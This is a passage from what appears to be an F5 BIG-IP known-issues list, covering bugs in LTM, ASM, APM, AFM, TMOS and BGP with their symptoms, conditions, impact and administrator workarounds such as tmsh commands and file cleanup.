A warning message "Your BIG-IP version does not support the selected category of configuration templates. Please upgrade your BIG-IP system to configure them." Instead, the configurations list (categories) is available.

Conditions:
There is a mismatch versions between the Guided Configuration installed and the BIG-IP.

Impact:
You cannot choose any of the guided configuration categories that otherwise would be available.

Workaround:
Uninstall all iApps packages and return to Guided Configuration, allowing BIG-IP to reinstall the default packages as part of the GC release package. Alternatively, the "Upgrade Guided Configuration" option can be used to upload and install a newer version of GC. Since iApps packages are bundled within a GC release, these methods ensure compatibility and eliminate version mismatch problems.


1952557-1 : DB monitor incorrectly marks pool member UP if recv string configured but no results from DB server

Links to More Info: BT1952557

Component: Local Traffic Manager

Symptoms:
A database monitor (mssql, mysql, oracle, postgresql) may incorrectly mark a pool member as UP if the monitor is configured with a 'recv' string, but the query configured in the 'send' string does not return any results from the database server.

In this case, the DB (database) monitor attempts to match the 'recv' string to the result set from the database server, and fails to mark an empty result set as a mismatch.

Conditions:
-- A DB (database) monitor (mssql, mysql, oracle, postgresql) is configured and applied to an LTM or GTM pool.
-- The DB monitor has a 'send' string configured with a query that does not return any results from the database server.
-- The DB monitor has a 'recv' string configured.

Impact:
Pool members may be incorrectly marked UP.

Workaround:
In the DB monitor configuration, modify the query in the 'send' to return a result that does not match the 'recv' string.


1943669 : "Automatic Update Check & Automatic Phone Home features" settings is changed upon running 'load sys config current-partition' in other partition

Links to More Info: BT1943669

Component: TMOS

Symptoms:
'auto-check' and 'auto-phonehome' configurations are not updated on non-Common partitions.

Conditions:
1. Disable "auto-check" and "auto-phonehome"
2. Save the config
3. Check "auto-check" and "auto-phonehome" status.
4. Switch to non-Common partition.
5. Load the current config
6. Check the "auto-check" and "auto-phonehome"
7. Switch back to common partition and check the status.

Impact:
These features could be enabled if you load the configuration on the non-Common partitions.

Workaround:
Disable 'auto-check' and 'auto-phonehome' again after switching back to the Common partition.


1943593-2 : Inconsistent DoS Attack Status between tmctl/event logs and GUI

Links to More Info: BT1943593

Component: Advanced Firewall Manager

Symptoms:
GUI shows "Not Detected / Forwarded" for PPS even though tmctl reports detection.

Conditions:
PPS rate fluctuates around the threshold, often staying below it.

Impact:
Detection is triggered internally (tmctl), but not reflected in the GUI; this may mislead operators monitoring attacks via the GUI.

Workaround:
None


1943257-1 : HTTP monitor "last error" string sends incorrect response

Links to More Info: BT1943257

Component: Local Traffic Manager

Symptoms:
When a recv string is used with an HTTP/HTTP2 monitor, the HTTP status code is collected and in the event of failure, the most recent value (from before the failure) is retrieved and used as part of the log output. This can result in a message that is misleading.

Conditions:
- The BIG-IP system configured to monitor an HTTP/HTTP2 server.

Impact:
Generates a misleading log messages, difficulty in identifying the actual cause of the monitor failure.

notice mcpd[8371]: 01070638:5: Pool /Common/http-pool member /Common/172.16.1.87:80 monitor status down. [ /Common/my-http-monitor: down; last error: /Common/my-http-monitor: Response Code: 200 (OK) @2025/05/12 07:30:25. ] [ was up for 0hr:0min:46sec ]

Workaround:
None


1943217 : BGP - using 'no bgp default ipv4-unicast' might lead to a crash

Links to More Info: BT1943217

Component: TMOS

Symptoms:
Using 'no bgp default ipv4-unicast' might lead to a crash when saving a configuration.

Conditions:
'no bgp default ipv4-unicast' configured.

Impact:
Bgpd crash/core.

Workaround:
Do not use 'no bgp default ipv4-unicast' configuration statement.


1938345 : F5 on AWS : Unable to Launch F5 BIG-IP instance with latest firmware 17.5.0 in AWS

Links to More Info: BT1938345

Component: TMOS

Symptoms:
BIG-IP AWS instance using AMI image for 17.5.0 intermittently fails to complete onboarding, specifically for one particular flavour of image - F5 BIGIP-17.5.0-0.0.15 PAYG-Best Plus 1Gbps.

Conditions:
When rapid BIG-IP instance ami is deployed on AWS. Specially F5 BIGIP-17.5.0-0.0.15 PAYG-Best Plus 1Gbps AMI.

Impact:
Intermittently the instance completes deployment but without network configuration such as vlans, self IPs and routes

Workaround:
The issue is resolved on the next DHCP lease update


1938101-1 : Performance issue on specific parameters extractions

Links to More Info: BT1938101

Component: Application Security Manager

Symptoms:
Performance degradation on specific pages

Conditions:
When there are dynamic parameters extractions using HTML

Impact:
Slowdown of the extraction page load time

Workaround:
None


1938085-1 : Performance issue on specific parameters extractions

Links to More Info: BT1938085

Component: Application Security Manager

Symptoms:
Performance degradation on specific pages

Conditions:
When there are dynamic parameters extractions using HTML

Impact:
Slowdown of the extraction page load time

Workaround:
None


1937717-1 : AVR increases the Content-Length header but fails to inject the CSPM script into the payload

Links to More Info: BT1937717

Component: Application Visibility and Reporting

Symptoms:
Under certain conditions, AVR will change the Content-Length header (to account for CSPM script injection) but then will not inject the actual CSPM script onto the HTTP payload

Conditions:
- Option "collect-page-load-time" is enabled in the AVR profile
- Sys db key "avr.cspm.inject.location" is set to a value of "after_head"

Impact:
Client can stall waiting for the remaining payload which never arrives

Workaround:
Do at least one of the following things:

- On the HTTP profile, set option "response-chunking" to "rechunk"
- Set sys db key "avr.cspm.inject.location" to "at_the_end"
- On the AVR profile, disable option "collect-page-load-time"


1937589-1 : LTM v17.x f5-irule.crt is valid only until Jul 2027

Links to More Info: BT1937589

Component: Local Traffic Manager

Symptoms:
The nodejs services using default f5-irule.crt certificate request template gets validity upto jul 2027 and may fail to work after July 2027.
Haven't provided any access to use these certificates in other Node.js services, although they could logically be used.

Conditions:
BIG-IP software version 17.x using nodeJS/iRules beyond July 2027 without modifying f5-irule.crt validity period.

Impact:
NodeJS/iRules services using unmodified f5-irule.crt fails to work after July 2027.

Workaround:
None


1936469-1 : Multiple Ctrl-Alt-Delete signals in virtual console reboots BIG-IP Virtual Edition

Links to More Info: BT1936469

Component: TMOS

Symptoms:
A device reboot occurs when pressing Ctrl-Alt-Del multiple times in rapid succession.

Conditions:
This occurs when pressing Ctrl-Alt-Del or sending the command to a BIG-IP Virtual Edition (VE) virtual console more than 7 times within 2 seconds.

Impact:
Accidental or unauthorized reboots of the BIG-IP instance are possible.

Workaround:
None


1935713-2 : TMM crash when handling traffic over vlangroup with autolasthop disabled.

Links to More Info: BT1935713

Component: Local Traffic Manager

Symptoms:
In certain circumstances, TMM may crash when handling traffic over a vlangroup with autolasthop disabled.

Conditions:
- Vlangroup.
- No self-IP addresses configured.
- Autolasthop is disabled.

Impact:
Traffic disrupted while tmm restarts.

Workaround:
None


1935053-3 : Impact of crypto queue limits on SSL handshake reliability

Links to More Info: BT1935053

Component: Local Traffic Manager

Symptoms:
SSL handshake failures triggered by sudden connection spikes and crypto queue saturation

Conditions:
1. Brief surge in SSL connection volume
2. Saturation of the crypto processing queue

Impact:
Degraded service availability due to SSL handshake disruptions

Workaround:
None


1934941-3 : Assertion failure in aspath_intern for BGPD.

Links to More Info: BT1934941

Component: TMOS

Symptoms:
Assertion failure in BGPD

Conditions:
BGP routing configured, enabled

Impact:
Assertion failure

Workaround:
None


1934845-1 : Transparent proxy loses APM session variables in SSL Orchestrator service

Links to More Info: BT1934845

Component: SSL Orchestrator

Symptoms:
Cannot access session variables

Conditions:
SSL Orchestrator Transparent Proxy configuration

Impact:
Unable to access session variables with Transparent Proxy

Workaround:
Attach a dummy swg_transparent


1934457-4 : Cursor in BIG-IP Configuration Utility iRule editor appears in the incorrect position

Links to More Info: BT1934457

Component: TMOS

Symptoms:
The cusrsor is at the incorrect position when using BIG-IP Configuration Utility iRule editor for long lines with unwrapped text.

Conditions:
1. Edge or Chrome on Windows
2. Zoom is set at 100%
3. "Wrap Text", "Show Print Margin", and "Ignore Signature/Checksum" are unchecked
4. For a long line in the editor, the cursor would appear in the wrong position.

Impact:
Editing the iRule becomes inconvenient and prone to errors.

Workaround:
Set the zoom in the browsers at 125%


1934397-2 : SSL Orchestrator l2 inline monitor failure on r2000 or r4000 tenants

Links to More Info: BT1934397

Component: Local Traffic Manager

Symptoms:
SSL Orchestrator l2 inline monitors may not function correctly on r2000 or r4000 tenants.

Conditions:
-- SSL Orchestrator
-- l2 inline monitor

A traffic capture will show packets being egressed out one interface and not arriving at the other.

Impact:
The l2 inline service monitored via these interfaces will be marked down.

Workaround:
The issue is due to the MAC filter that is installed for every interface's MAC address. When the filter also matches a vlan MAC address this issue occurrs.

Compare the output of

tmsh show net interface all-properties
and
tmsh show net vlan

and make sure there is no MAC overlap. If there is, create some "dummy" vlans to move the overlap.

After creating dummy vlans, re-assign the MACs with the following command

tmsh modify ltm global-settings general share-single-mac global
tmsh modify ltm global-settings general share-single-mac unique


1934373-2 : DoS attack is blocking while transparent

Links to More Info: BT1934373

Component: Application Security Manager

Symptoms:
A DoS attack is blocking while configured as transparent.
The blocking is only by resets

Conditions:
A transparent volumetric dosl7 and web acceleration profile are configured on the same virtual

Impact:
Blocking even though the configuration is transparent.

Workaround:
tmsh modify sys db dosl7d.static_uri_protection value disable


1934157-2 : Http2 monitor fails if a pool is used for routing to pool members

Links to More Info: BT1934157

Component: Local Traffic Manager

Symptoms:
Http2 monitoring reports all pool members as down

Conditions:
The TCP connection to the pool members are sent to the gateway instead of the pool members

Impact:
Http2 monitoring not possible

Workaround:
Use tcp monitoring or https if possible and acceptable.


1934073-2 : PEM policy rule incorrectly matching when using a flow condition

Links to More Info: BT1934073

Component: Policy Enforcement Manager

Symptoms:
When a PEM policy rule is configured to match the destination IP address and port, the message might match the source IP and port instead.

Conditions:
PEM policy rule is using flow conditions to match IP address and port

Impact:
An incorrect policy rule might be matched

Workaround:
None


1933965-2 : Unable to associate multiple cert/keys of different types to Certificate Key Chain via TMSH

Links to More Info: BT1933965

Component: Local Traffic Manager

Symptoms:
Below error is thrown when assigning RSA cert/key followed by ECDSA cert/key with below command

tmsh create ltm profile client-ssl /path/_ssl_server cert-key-chain replace-all-with {
  _cert_rsa_0 {
    cert /path/_cert_rsa.crt
    key /path/_cert_rsa.key
    chain none
    usage SERVER
  }
  _cert_ecdsa_0 {
    cert /path/_cert_ecdsa.crt
    key /path/_cert_ecdsa.key
    chain none
    usage SERVER
  }
}

Error:
010717e1:3: Client SSL profile (/path/_ssl_server): cannot contain more than one set of same certificate/key type.

Conditions:
Assigning RSA cert/key followed by ECDSA cert/key

Impact:
Unable to create the client SSL profile

Workaround:
Workaround 1: change the certificate chain order so the ECDSA cert/key occurs before the RSA cert/key.

tmsh create ltm profile client-ssl /path/_ssl_server cert-key-chain replace-all-with \{ _cert_ecdsa_0 \{ cert /path/_cert_ecdsa.crt key /path/_cert_ecdsa.key chain none usage SERVER \} _cert_rsa_0 \{ cert /path/_cert_rsa.crt key /path/_cert_rsa.key chain none usage SERVER \} \}

tmsh list ltm profile client-ssl /path/_ssl_server

ltm profile client-ssl /path/_ssl_server {
  app-service none
  cert-key-chain {
    _cert_ecdsa_0 {
      cert /path/_cert_ecdsa.crt
      key /path/_cert_ecdsa.key
    }

    _cert_rsa_0 {
      cert /path/_cert_rsa.crt
      key /path/_cert_rsa.key
    }
  }

  inherit-ca-certkeychain true
  inherit-certkeychain false
}

Workaround #2: Create a Client SSL and associate only 1 RSA cert/key. Thereafter, associate the next set of ECDSA cert/key to the same Client SSL profile.

1) Create SSL profile and associate only the RSA cert/key to Certificate Key Chain.

# tmsh create ltm profile client-ssl /path/_ssl_server cert-key-chain replace-all-with \{ _cert_rsa_0 \{ cert /path/_cert_rsa.crt key /path/_cert_rsa.key chain none usage SERVER \} \}
 

2) Associate existing ECDSA cert/key to Certificate Key Chain of the above SSL Profile

#tmsh modify ltm profile client-ssl /path/_ssl_server cert-key-chain add {_cert_ecdsa_0 { cert /path/_cert_ecdsa.crt key /path/_cert_ecdsa.key chain none usage SERVER }}
 
tmsh list ltm profile client-ssl /path/_ssl_server
ltm profile client-ssl /path/_ssl_server {
    app-service none
    cert-key-chain {
        _cert_ecdsa_0 {
            cert /path/_cert_ecdsa.crt
            key /path/_cert_ecdsa.key
        }
        _cert_rsa_0 {
            cert /path/_cert_rsa.crt
            key /path/_cert_rsa.key
        }
    }
    inherit-ca-certkeychain true
    inherit-certkeychain false
}


1933825-2 : High cpu usage by BD

Links to More Info: BT1933825

Component: Application Security Manager

Symptoms:
High cpu usage by BD

Conditions:
A specific condition leads BD to unnecessary high CPU

Impact:
High CPU

Workaround:
None


1933105-3 : TMM does not fragment the output before encapsulating the payload

Links to More Info: BT1933105

Component: TMOS

Symptoms:
Tmm does not fragment the traffic before it goes to encapsulation

Conditions:
- IPSec
-- Tmm receives fragmented payload

Impact:
Large packets are not fragmented on egress.

Workaround:
None


1933061-1 : Changing "bot category" of an user-defined bot-signature should be validated and denied when the change is not appropriate

Links to More Info: BT1933061

Component: Application Security Manager

Symptoms:
Disallowed configuration gets accepted. Subsequent full configuration load fail and unit remains offline.

Conditions:
A user-defined bot is configured under bot-signature
AND the bot is configured for mitigation exception

Then, bot category of the bot gets updated and new category is one of the categories that is under Unknown/Browser/Mobile Application class

After above operation are performed, subsequent config full load fails.

Impact:
Configuration load fail and unit remains offline.

Workaround:
- Do not perform the operation described in Conditions section

- If it has been performed but your unit is still online, use GUI or TMSH to revert the change of bot category

- If it has been performed and config load has failed and unit is offline state, manually revert the change of bot category as below

e.g:

MyBot was configured in mitigation exception. Bot category of MyBot was updated to be "Mobile App without SDK" that should not be accepted, but accepted due to this bug.

Manually modify /config/bigip.conf

// Before manual modification

security bot-defense signature /Common/MyBot {
    category "/Common/Mobile App without SDK"
    risk na
    user-agent {
        search-string MyBot
    }
}

// After manual modification

security bot-defense signature /Common/MyBot {
    category "/Common/Search Bot"
    risk na
    user-agent {
        search-string MyBot
    }
}


Save the change then
# bigstart restart

If this does not reflect the manual modification, perform force mcpd reload.

# rm -f /var/db/mcpdb.* ; touch /service/mcpd/forceload
# bigstart restart


1932965-1 : AVRD may crash at startup due to non-thread-safe version of BOOST json Spirit parser

Links to More Info: BT1932965

Component: Application Visibility and Reporting

Symptoms:
Avrd crashes while processing JSON

Conditions:
AVRD utilizes the BOOST Spirit-based JSON parser to parse JSON documents

Impact:
AVRD might crash impacting application performance and traffic analytics may stop being collected or processed while avrd restarts.

Workaround:
None


1932161-3 : PEM iRule usage memory leak

Links to More Info: BT1932161

Component: Policy Enforcement Manager

Symptoms:
When using PEM iRules there is a chance of a memory leak

Conditions:
Using PEM iRules

Impact:
TMM memory leak

Workaround:
None


1930897-1 : Tmm core due to overflow of ifc ref counts with flow forwarding

Links to More Info: BT1930897

Component: Local Traffic Manager

Symptoms:
Tmm crashes when passing high amounts of traffic.

Conditions:
Flow forwarding rejected when accepting flows due to high volume of packets that exhausts connection limit and overflows the ifc ref count.

Impact:
Traffic disrupted while tmm restarts.

Workaround:
None


1930841-1 : Tmsh show sys conn virtual-server may report an incomplete set of flows after a virtual server modification

Links to More Info: BT1930841

Component: Local Traffic Manager

Symptoms:
After modifying a virtual server, 'tmsh show sys connection virtual <virtual-server-name>' may not report connections already existing when the change occurred.

Conditions:
Use the command "tmsh show sys connection virtual <virtual-server-name>".

Impact:
The complete set of connections for the virtual server may not be reported.

Workaround:
Use 'tmsh show sys connection cs-server-addr' (or other selection criteria) instead.


1929045-3 : TMM may core after HTTP::respond used for first request on iSession connection

Links to More Info: BT1929045

Component: Local Traffic Manager

Symptoms:
TMM crashes while establishing an iSession tunnel.

Conditions:
- APM configured
- Tunnel being established

Impact:
Traffic disrupted while tmm restarts.

Workaround:
None


1928169-1 : HTTP2 RST_STREAM NO_ERROR received by BIG-IP not interpreted correctly

Links to More Info: BT1928169

Component: Local Traffic Manager

Symptoms:
Communication disrupted to the client when server sends a RST_STREAM NO ERROR

Conditions:
if the server has already sent a response (e.g., headers and body) and does not need additional data from the client (e.g., request body for POST or PUT requests), it might send a RST_STREAM with NO_ERROR to stop the stream and signal that no further data is required.

Impact:
Communication disrupted.

Workaround:
None


1928157-1 : [APM][SAML] constant SIGSEGV "in saml_sp_finish_message_signing" after upgrade to 17.1.x

Links to More Info: BT1928157

Component: Access Policy Manager

Symptoms:
After upgrade, tmm crashes while passing SAML traffic.

Conditions:
-- SAML profile configured.
-- The profile doesn't have a signed certificate configured for the SP profile
-- The IDP profile does have a signed certificate

Impact:
Traffic disrupted while tmm restarts.

Workaround:
Add the signed certificate to the same profile


1927829-1 : SSL Orchestrator resets connection with connection abort waiting for data from an inline service

Links to More Info: BT1927829

Component: SSL Orchestrator

Symptoms:
Traffic flowing through topologies gets reset (RST) instead of waiting for data to flow from inline services.

Conditions:
A topology is configured to make use of at least one inline service.

Impact:
Connections get reset (RST) and the client does not get data.

Workaround:
None


1927521-1 : DPDK has dependency on SSSE3

Links to More Info: BT1927521

Component: TMOS

Symptoms:
TMM goes into restart loop with following error in /var/log/tmm regarding SSSE3 not being available

notice ERROR: This system does not support "SSSE3".
notice Please check that RTE_MACHINE is set correctly.
notice EAL: FATAL: unsupported cpu type.
notice EAL: unsupported cpu type.
notice dpdk: Error: rte_eal_init() failed, err=-1
notice xnet_lib [pci:0000:02:00.0]: Error: Failed to initialize driver
notice xnet[02:00.0]: Error: Unable to attach to xnet dev
notice xnet(1.1)[02:00.0]: Error: Unable to initialize device
notice xnet(1.1)[02:00.0]: Waiting for tmm1 to reach state 4...
notice ndal Error: Restarting TMM
notice Initiating TMM shutdown.
notice tap(tap)[00:00.0]: Waiting for tmm1 to reach state 4...
notice ---------------------------------------------

Conditions:
1) xnet-DPDK is being used
2) BIG-IP running in an environment where SSSE3 is not available either because CPU is so old that it does not support SSSE3 or SSSE3 has been disabled in VM's config.

Impact:
Traffic disrupted while tmm restarts.

Workaround:
Switch to 'sock' driver by adding the following line into /config/tmm_init.tcl, replacing <VENDOR_ID:DEVICE_ID> with the corresponding interfaces' Vendor and Device IDs shown via 'lspci -nn'.
For environments in HyperV or Azure, f5f5:f550 should be used for Vendor and Device.

[root@BIGIP:Active:Standalone] log # cat /config/tmm_init.tcl
device driver vendor_dev <VENDOR_ID:DEVICE_ID> sock
[root@BIGIP:Active:Standalone] log #


1927165 : Fix rare race condition that could cause crash during TMM startup

Links to More Info: BT1927165

Component: TMOS

Symptoms:
TMM crashes during TMM startup

Conditions:
-- Virtual Edition in Azure
-- TMM starting up

Impact:
TMM occasionally fails during startup, increasing amount of time before BIG-IP becomes Active.

Workaround:
None


1926733-1 : Tmm memory leak with L7 response policy

Links to More Info: BT1926733

Component: Local Traffic Manager

Symptoms:
TMM slowly leaks memory.

During diagnosis, with the following diagnostic command:
tmctl -w192 -id blade memory_usage_stat | egrep "http_data|cur_"

http_data indicates the highest memory usage

Conditions:
-- Virtual Server with fastL4 + HTTP
-- L7 response policy attached (for example redirect-http-https)

Impact:
Http_data usage goes up over time and does not return to prior levels when traffic ceases.

Workaround:
None


1922617-3 : BGP Multipath selection might be unpredictable.

Links to More Info: BT1922617

Component: TMOS

Symptoms:
BGP Multipath selection might be unpredictable.

Conditions:
Four EBGP neighbors in two different AS, each sending the same route (NRLI) towards BIG-IP. Route might sometimes not be considered candidate for multipath.

Impact:
Route might not be considered candidate for multipath.

Workaround:
Set 'bgp bestpath as-path multipath-relax' to install all available paths.


1921085-1 : Core file generated when using FTP::ftps_mode require without SSL profile in TCP filter

Links to More Info: BT1921085

Component: Local Traffic Manager

Symptoms:
Tmm crashes while passing ftp traffic.

Conditions:
1. create a FTP virtual without SSL profile.
2. create a iRule to force FTP::ftps_mode require in FTP profile like
when CLIENT_ACCEPTED {
    FTP::ftps_mode require
}

3. Attempt FTP transfer via FTP virtual created.

Impact:
Traffic disrupted while tmm restarts.

Workaround:
Attach appropriate SSL profile to the FTP virtual.


1921069-2 : The error ERR_ARG occurs when using iRule HTTP::collect command without the parameter value in HTTP_REQUEST_DATA

Links to More Info: BT1921069

Component: Local Traffic Manager

Symptoms:
The iRule HTTP::collect command without the parameter value in HTTP_REQUEST_DATA returns an error.

Conditions:
The error occurs when the HTTP::collect does not have any value.

Impact:
The iRule fails with ERR_ARG error.

Workaround:
Always enter value to HTTP::collect. Refer HTTP::collect iRule command page, https://clouddocs.f5.com/api/irules/HTTP__collect.html.

This workaround will depend on the specific iRule being used.


1921049-1 : When L7 policy is updated, existing HTTP/2 connection using it gets a RST_STREAM

Links to More Info: BT1921049

Component: Local Traffic Manager

Symptoms:
HTTP/2 connections sometimes get a RST_STREAM

Conditions:
L7 policy that is being used by HTTP/2 connections is updated or changed.

Impact:
Lost of connectivity on a HTTP/2 stream.

Workaround:
Avoid updating L7 Policy while Http/2 connections are active.


1921025-1 : Need more information when http2 RST STREAM

Links to More Info: BT1921025

Component: Local Traffic Manager

Symptoms:
Sometimes, finding the root cause of an http2 RST STREAM is more difficult

Conditions:
Troubleshooting issues with HTTP2

Impact:
Difficulty in debugging.

Workaround:
None


1917677-4 : "show security ip-intelligence info address" may fail to query legacy IP Reputation database

Links to More Info: BT1917677

Component: Advanced Firewall Manager

Symptoms:
When using the command "show security ip-intelligence info address", Query Legacy IP Reputation Database may not get queried.

Explicit documentation outlining how to configure a policy to enable IP reputation database queries in association with this command is missing.

Conditions:
- System provisioned with either ASM or AFM.
- IP Intelligence license activated.
- An IP Intelligence policy configured in the system.

Impact:
The command does not work with the database as intended.
Although the output of the command shows legacy in the IP Intelligence Sources, it does not return the lookup results of the IP reputation database.

Workaround:
None


1900621-2 : Missing client ip

Links to More Info: BT1900621

Component: Application Security Manager

Symptoms:
Client ip address not available for some dosl7 attack ids

Conditions:
Remote logging configured

Impact:
Source ip missing for some attack ids on remote server/dos dashboard

Workaround:
Check attack info in lcoal log_db which contains client ip in on another event


1893989-1 : NTP truncates symmetric keys to 30 bytes

Links to More Info: BT1893989

Component: TMOS

Symptoms:
The Network Time Protocol (NTP) server, where symmetric keys were used for cryptographic operations, was truncated to 30 bytes. This limitation restricted the effective length of symmetric keys even when longer keys were provided. As a result, it reduced the expected level of security for configurations utilizing keys longer than 30 bytes. (For example, using SHA256 symmetric keys will fail)

Conditions:
When NTP uses a symmetric key size of 30 bytes or more.

Impact:
- Truncating symmetric keys to 30 bytes in NTP significantly reduces security by limiting entropy, diminishing compliance with cryptographic standards, and opening systems to a range of attack vectors.
- The truncation silently weakens configurations, affecting user trust and operational reliability.

Workaround:
None


1890997-1 : TCP connection stall in TMM conn table with ASM policy and no websocket profile

Links to More Info: BT1890997

Component: Application Security Manager

Symptoms:
Virtual server configured with and ASM policy but no websocket profile. After a 101 response and the TCP 4-way teardown, the connection isn't removed from TMM connection table.

Conditions:
Virtual server with ASM policy, no websocket profile

Impact:
Connection is not removed from the TMM connection table

Workaround:
Add a websocket profile to the virtual server configuration.


1890749-2 : In a multi-user scenario, the system is allowing users to create more authentication tokens than the maximum limit allowed per user.

Links to More Info: BT1890749

Component: TMOS

Symptoms:
In a multi-user scenario, users are able to create more tokens than the max allowed setting allows.

Conditions:
-- User1 creates 100 tokens
-- User2 creates 100 tokens
-- restart restjavad process
-- User1 try to create new token
-- User1 can create new token without an error

Impact:
No limitation for using tokens.

Workaround:
None


1889861-3 : Passive monitoring with ASM might not log the server response.

Links to More Info: BT1889861

Component: Local Traffic Manager

Symptoms:
Passive monitoring with ASM might not log the server response.

Conditions:
Passive monitoring with ASM deployed. Similar to https://techdocs.f5.com/en-us/bigip-14-1-0/big-ip-asm-implementations-14-1-0/working-with-passive-monitoring.html

Impact:
Server response is not getting logged.

Workaround:
None


1889741-2 : Need for the SYS DB variable to toggle ssl_crypto::queue_max

Links to More Info: BT1889741

Component: Local Traffic Manager

Symptoms:
While ssl_crypto::queue_max can be configured using TCL commands, a corresponding TMSH equivalent is required.

Conditions:
When the system handles a large number of concurrent SSL handshakes or cryptographic operations

Impact:
-- SSL handshake failures
-- Inability to configure the ssl_crypto::queue_max via tmsh

Workaround:
None


1881569-4 : Programs invoked by tmsh when session is interrupted may remain running

Links to More Info: BT1881569

Component: TMOS

Symptoms:
If an interactive user session is interrupted while a tmsh process is executing another command (e.g. bash), under particular circumstances the child process may continue executing.

This occurs if the bash process is itself executing a long-running command (e.g. 'watch' or 'tcpdump' or similar), and then the SSH connection is interrupted.

Conditions:
-- An interactive tmsh process runs another program (e.g. bash)
-- That bash process is executing another command that will not generally exit on its own without user intervention (e.g. 'watch' or 'tcpdump')
-- The user session is interrupted

Impact:
Processes remain executing even after they should have been terminated because the user session disconnected.

If the long-running command the bash process is executing tries to invoke tmsh, the LTM log file may contain repeated logs similar to the following:

Mar 25 12:10:00 hostname notice tmsh[22420]: 01420003:5: Cannot load user credentials for user "username"
Mar 25 12:10:00 hostname notice tmsh[22420]: 01420003:5: The current session has been terminated.

Workaround:
Avoid unclean shutdown/interruption of user sessions if possible. Otherwise, identify the long-running processes that are still running, and then kill them.


1881537-1 : Platform Agent does not log diff of Feature Info Attributes

Links to More Info: BT1881537

Component: F5OS Messaging Agent

Symptoms:
Whenever a change is made in F5OS, platform agent dumps the complete list of feature info attributes. Update the platform agent log to show the attribute changes to highlight relevant changes to ease debugging.

Conditions:
- F5OS change on hypervisor such as trunk change.
- Platform agent outputs feature info attributes list.

Impact:
Log messages could be more clear to ease debugging.

Workaround:
None


1881509-1 : Platform Agent not logging Trunk changes from F5OS

Links to More Info: BT1881509

Component: F5OS Messaging Agent

Symptoms:
When trunk changes are made in F5OS, they are not explicitly logged on the tenant.

Conditions:
F5OS tenant making a trunk change.

Impact:
Hard to debug trunk changes made live on F5OS.

Workaround:
None


1881145-3 : Change log level of PPP TunnelStats log messages to debug level

Links to More Info: BT1881145

Component: Access Policy Manager

Symptoms:
Presently PPP Tunnel Stats logs are in log level Notice.

Conditions:
Enable APM logs to Notice and establish VPN session. When disconnect VPN session user will see these logs.

Impact:
Lot of logs are seen in Notice level which are needed only for additional debugging.

Workaround:
None


1880441-2 : Security log profile IPI options are visible for configuration in UI but not allowed

Links to More Info: BT1880441

Component: Advanced Firewall Manager

Symptoms:
In the AFM UI (Security ›› Event Logs : Logging Profiles ›› Edit Logging Profile), the user can edit IPI section and enable the following checkboxes:

Log Shun Events Enabled
Log Geo Events Enabled
Log RTBH Events Enabled
Log Scrubber Events Enabled

However, enabling any of them may result in an error: « The <OPTION NAME> option can only be enabled on the global-network log profile.»

Conditions:
Using the AFM UI to enable the logging profile for IPI options

Impact:
The IPI logging options are not configurable in the UI

Workaround:
None


1856513-2 : Tomcat fails to write log messages to /usr/share/tomcat/logs/liveupdate.log

Links to More Info: BT1856513

Component: Application Security Manager

Symptoms:
You only see this message in /var/log/tomcat/liveupdate.log file. No other log messages are written, which impedes troubleshooting Live Update.

liveupdate.script file is corrupted, live update repository initialized with default schema

Conditions:
You are running on a version which has a fix for ID 907025.

For more information see https://cdn.f5.com/product/bugtracker/ID907025.html

Impact:
Difficult to troubleshoot issues that occur with Live Update

Tomcat memory growth can cause tomcat to run out of memory, be slow, and use higher than usual CPU due to increased garbage collection activity.

Workaround:
Run the following commands:

chown tomcat:tomcat /var/log/tomcat/liveupdate.log
 /usr/share/tomcat/logs/liveupdate.log

bigstart restart tomcat


1856425-1 : Old EPSEC images keeps coming back on standby device after reboot

Links to More Info: BT1856425

Component: Access Policy Manager

Symptoms:
Previous EPSEC packages still reside on the system /shared/apm/images/ even if they are deleted.

Conditions:
Even both standby and active are sync old epsec images are not being deleted from /shared/apm/images/
-- VIPRION system
-- High availability (HA) environment
-- vCMP with multiple blades
-- The system is rebooted

Impact:
Unnecessary retention of outdated EPSEC images.

Workaround:
1) Look for all epsec files on all blades:
clsh find / -path /proc -prune -o -name *epsec-1* -print

2) Delete older non-used epsec images (using UI or tmsh)
3) Verify no references to older epsec exist in bigip.conf. If they do, they need to be removed.

grep epsec /config/bigip.conf

4) Delete any orphan non-used epsec images from /config/filestore/files_d/Common_d/epsec_package_d/ (only keep the one listed in bigip.conf):

Ex:
clsh rm -f /config/filestore/files_d/Common_d/epsec_package_d/\:Common\:EPSEC\:Upload\:epsec-1.0.0-1622.0.iso_126649_1
clsh rm -f /config/filestore/files_d/Common_d/epsec_package_d/\:Common\:EPSEC\:Upload\:epsec-1.0.0-1505.0.iso_126643_1

5) Look again for all epsec files on all blades:
clsh find / -path /proc -prune -o -name *epsec-1* -print

6) If some older epsec files are still visible in /shared/apm/images/
6.1) Stop csyncd (this will prevent rsync from restoring epsec images while you try to delete them):

clsh bigstart stop csyncd

6.2) Delete leftover epsec (those not visible in UI):

Ex:
clsh rm -f /shared/apm/images/epsec-1.0.0-1622.0.iso
clsh rm -f /shared/apm/images/epsec-1.0.0-1505.0.iso
...

6.3) Start csyncd:

clsh bigstart start csyncd

6) Sync to standby (if manual sync)

Once completed, move on to standby.

#############
# On standby:
#############

1) Look for all epsec files on all blades:
clsh find / -path /proc -prune -o -name *epsec-1* -print

2) Stop csyncd (that will prevent rsync from restoring epsec images while you try to delete them):

clsh bigstart stop csyncd

3) Delete leftover epsec (those not visible in UI):

Ex:
clsh rm -f /shared/apm/images/epsec-1.0.0-1622.0.iso
clsh rm -f /shared/apm/images/epsec-1.0.0-1505.0.iso
...

4) Verify no references to older epsec exist in bigip.conf. If any, we need to do a full sync from active to standby again.

grep epsec /config/bigip.conf

=> you should see the same thing as the active

5) Delete any orphan non-used epsec images from /config/filestore/files_d/Common_d/epsec_package_d/ (only keep the one listed in bigip.conf):

Ex:
clsh rm -f /config/filestore/files_d/Common_d/epsec_package_d/\:Common\:EPSEC\:Upload\:epsec-1.0.0-1622.0.iso_126649_1
clsh rm -f /config/filestore/files_d/Common_d/epsec_package_d/\:Common\:EPSEC\:Upload\:epsec-1.0.0-1505.0.iso_126643_1
...

6) Start csyncd:

clsh bigstart start csyncd

7) Look again for all epsec files on all blades:
clsh find / -path /proc -prune -o -name *epsec-1* -print

8) If you need to confirm that older epsec images are not coming back, reboot the standby guest chassis


1856285-3 : [APM]mdmsyncmgr core is observed very intermittently

Links to More Info: BT1856285

Component: Access Policy Manager

Symptoms:
Mdmsyncmgr process cores

Conditions:
MDM usecase in APM Network Access

Impact:
Unable to use MDM

Workaround:
None


1854461-2 : Unable to delete file from "Available to Deploy" when removed from "Available to Install"

